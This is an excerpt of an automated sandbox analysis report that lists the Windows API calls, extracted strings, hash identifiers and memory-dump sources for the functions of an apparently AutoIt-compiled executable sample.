                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: SendString$_memmove_wcslen
                                          • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                          • API String ID: 369157077-1007645807
                                          • Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                          • Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
                                          • Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                          • Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
                                          APIs
                                          • GetParent.USER32 ref: 00445BF8
                                          • GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
                                          • __wcsicoll.LIBCMT ref: 00445C33
                                          • __wcsicoll.LIBCMT ref: 00445C4F
                                          • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: __wcsicoll$ClassMessageNameParentSend
                                          • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                          • API String ID: 3125838495-3381328864
                                          • Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                          • Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
                                          • Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                          • Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
                                          APIs
                                          • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                                          • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                                          • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                                          • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                                          • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                                          • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                                          • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                                          • SendMessageW.USER32(?,00000402,?), ref: 00449399
                                          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: MessageSend$CharNext
                                          • String ID:
                                          • API String ID: 1350042424-0
                                          • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                          • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                                          • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                          • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
                                          APIs
                                            • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                            • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                          • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                                          • _wcscpy.LIBCMT ref: 004787E5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                          • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                                          • API String ID: 3052893215-2127371420
                                          • Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                          • Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
                                          • Opcode Fuzzy Hash: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                          • Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
                                          APIs
                                          • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                          • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                                          • __swprintf.LIBCMT ref: 0045E7F7
                                          • _wprintf.LIBCMT ref: 0045E8B3
                                          • _wprintf.LIBCMT ref: 0045E8D7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                          • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                          • API String ID: 2295938435-2354261254
                                          • Opcode ID: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                          • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                                          • Opcode Fuzzy Hash: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                          • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: __swprintf_wcscpy$__i64tow__itow
                                          • String ID: %.15g$0x%p$False$True
                                          • API String ID: 3038501623-2263619337
                                          • Opcode ID: dbd07ee36d68efbdb82b47f6bbdb5a558a403895529f1bd62c5843a789ef215e
                                          • Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
                                          • Opcode Fuzzy Hash: dbd07ee36d68efbdb82b47f6bbdb5a558a403895529f1bd62c5843a789ef215e
                                          • Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A
                                          APIs
                                          • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                          • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                                          • __swprintf.LIBCMT ref: 0045E5F6
                                          • _wprintf.LIBCMT ref: 0045E6A3
                                          • _wprintf.LIBCMT ref: 0045E6C7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                          • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                          • API String ID: 2295938435-8599901
                                          • Opcode ID: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                          • Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
                                          • Opcode Fuzzy Hash: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                          • Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
                                          APIs
                                          • timeGetTime.WINMM ref: 00443B67
                                            • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                                          • Sleep.KERNEL32(0000000A), ref: 00443B9F
                                          • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00443BC8
                                          • SetActiveWindow.USER32(?), ref: 00443BEC
                                          • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                                          • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00443C22
                                          • Sleep.KERNEL32(000000FA), ref: 00443C2D
                                          • IsWindow.USER32(?), ref: 00443C3A
                                          • EndDialog.USER32(?,00000000), ref: 00443C4C
                                            • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                            • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                            • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                          • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                                          • String ID: BUTTON
                                          • API String ID: 1834419854-3405671355
                                          • Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                          • Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
                                          • Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                          • Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                                          • LoadStringW.USER32(00000000), ref: 00454040
                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                          • _wprintf.LIBCMT ref: 00454074
                                          • __swprintf.LIBCMT ref: 004540A3
                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                                          • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                          • API String ID: 455036304-4153970271
                                          • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                          • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
                                          • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                          • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
                                          APIs
                                          • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                                          • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                                          • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                                          • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                                          • _memmove.LIBCMT ref: 00467EB8
                                          • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                                          • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                                          • _memmove.LIBCMT ref: 00467F6C
                                          • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                                          • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                            • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                          • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                          • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                                          • String ID:
                                          • API String ID: 2170234536-0
                                          • Opcode ID: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                          • Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
                                          • Opcode Fuzzy Hash: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                          • Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
                                          APIs
                                          • GetKeyboardState.USER32(?), ref: 00453CE0
                                          • SetKeyboardState.USER32(?), ref: 00453D3B
                                          • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                                          • GetKeyState.USER32(000000A0), ref: 00453D75
                                          • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                                          • GetKeyState.USER32(000000A1), ref: 00453DB5
                                          • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                                          • GetKeyState.USER32(00000011), ref: 00453DEF
                                          • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                                          • GetKeyState.USER32(00000012), ref: 00453E26
                                          • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                                          • GetKeyState.USER32(0000005B), ref: 00453E5D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: State$Async$Keyboard
                                          • String ID:
                                          • API String ID: 541375521-0
                                          • Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                          • Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
                                          • Opcode Fuzzy Hash: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                          • Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65
                                          APIs
                                          • GetDlgItem.USER32(?,00000001), ref: 004357DB
                                          • GetWindowRect.USER32(00000000,?), ref: 004357ED
                                          • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                                          • GetDlgItem.USER32(?,00000002), ref: 0043586A
                                          • GetWindowRect.USER32(00000000,?), ref: 0043587C
                                          • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                                          • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                                          • GetWindowRect.USER32(00000000,?), ref: 004358EE
                                          • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                                          • GetDlgItem.USER32(?,000003EA), ref: 00435941
                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Window$ItemMoveRect$Invalidate
                                          • String ID:
                                          • API String ID: 3096461208-0
                                          • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                          • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
                                          • Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                          • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
                                          APIs
                                          • GetWindowLongW.USER32(?,000000F0), ref: 004714DC
                                          • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
                                          • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
                                          • DeleteObject.GDI32(?), ref: 0047151E
                                          • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
                                          • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
                                          • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
                                          • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
                                          • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
                                          • SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
                                          • DeleteObject.GDI32(?), ref: 004715EA
                                          • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
                                          • String ID:
                                          • API String ID: 3218148540-0
                                          • Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                          • Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
                                          • Opcode Fuzzy Hash: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                          • Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
